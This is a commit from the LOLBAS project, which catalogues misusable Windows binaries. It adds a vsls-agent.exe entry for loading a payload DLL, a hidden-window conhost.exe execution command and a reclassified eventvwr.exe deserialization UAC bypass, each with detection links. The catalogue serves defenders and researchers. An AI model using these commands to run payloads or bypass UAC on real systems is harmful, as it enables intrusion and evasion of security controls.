Add vsls-agent lolbin and committing a few other changes (#263)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
bohops 2023-02-25 13:47:44 -05:00 committed by GitHub
parent ded90467a8
commit cd16f0aff3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 35 additions and 3 deletions

View File

@ -14,7 +14,7 @@
* Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc. * Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc.
* Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities. * Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities.
* OLBAS: Living Off The Land Binaries and Scripts * LOLBAS: Living Off The Land Binaries and Scripts
* LOLBIN: Living Off The Land Binary * LOLBIN: Living Off The Land Binary
* LOL/"lol": Living Off The Land * LOL/"lol": Living Off The Land

View File

@ -72,6 +72,7 @@ The following folks help maintain the LOLBAS Project on their personal time:
* Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker)) * Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker))
* Liam ([@liamsomerville](https://twitter.com/liamsomerville)) * Liam ([@liamsomerville](https://twitter.com/liamsomerville))
* Wietze ([@Wietze](https://twitter.com/@Wietze)) * Wietze ([@Wietze](https://twitter.com/@Wietze))
* Jose Hernandez ([@_josehelps](https://twitter.com/_josehelps))
## Thanks ## Thanks

View File

@ -11,6 +11,13 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
- Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable)
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path: Full_Path:
- Path: c:\windows\system32\conhost.exe - Path: c:\windows\system32\conhost.exe
Detection: Detection:
@ -19,6 +26,8 @@ Detection:
Resources: Resources:
- Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
- Link: https://twitter.com/Wietze/status/1511397781159751680 - Link: https://twitter.com/Wietze/status/1511397781159751680
- Link: https://twitter.com/embee_research/status/1559410767564181504
- Link: https://twitter.com/ankit_anubhav/status/1561683123816972288
Acknowledgement: Acknowledgement:
- Person: Adam - Person: Adam
Handle: '@hexacorn' Handle: '@hexacorn'

View File

@ -14,9 +14,9 @@ Commands:
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Category: Execute Category: UAC Bypass
Privileges: Administrator Privileges: Administrator
MitreID: T1202 MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe

View File

@ -0,0 +1,22 @@
---
Name: vsls-agent.exe
Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Created: 2022-11-01
Commands:
- Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml
Resources:
- Link: https://twitter.com/bohops/status/1583916360404729857
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'